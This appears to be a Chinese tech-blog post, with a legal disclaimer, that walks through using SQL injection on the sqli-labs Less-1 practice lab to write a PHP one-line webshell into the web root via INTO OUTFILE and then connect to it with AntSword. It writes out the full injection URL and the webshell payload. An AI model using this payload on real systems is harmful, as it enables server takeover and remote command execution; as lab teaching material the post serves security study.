0823.1292天:SQL注入上传木马

2022-08-22  本文已影响0人  我的职业生涯

#每日三件事,第1292天#

特别说明:请遵守《网络安全法》、《刑法》以及《民法典》等相关法律。本文仅仅用于技术研究,凡是利用本文提供的技术和方法从事非法活动的,本人不承担任何责任。

SQL注入其实是通过获得应用系统对数据的操作账户,然后在数据库中读取相关信息,进而通过数据库提供的命令对操作系统的文件进行读写。这时候,就有机会对操作系统上传木马。

非常必要的前提就是:这个账户对当前目录有写的权限。


通过SQL注入写入文件

可以看到,test.php文件是通过mysql账户写进去的。

连接数据库的账户

从这里可以看到连接数据库用的是root账户,权限还是最高的。

root的权限

再看看操作系统中目录的权限:


Less-1目录的权限

这个目录被我改成了777,并没有其他什么隐含的权限。

一旦有写的权限,此服务器就有机会被上传木马。

以sqli-lab的Less1为例说一下怎么上传木马:

第一:修改Less-1目录的权限

chmod -R 777 Less-1 

第二:上传PHP一句话木马

http://127.0.0.1/Less-1/?id=1' 
union select 1,2,"<?php eval($_POST['cmd']);?>"  
into outfile "/var/www/html/Less-1/test.php" 
--+

第三:通过蚁剑连接木马


蚁剑连接木马 蚁剑连接结果

如果感觉一句话木马不够厉害的话,可以继续上传更大的马对系统进行操控。

上一篇 下一篇

猜你喜欢

热点阅读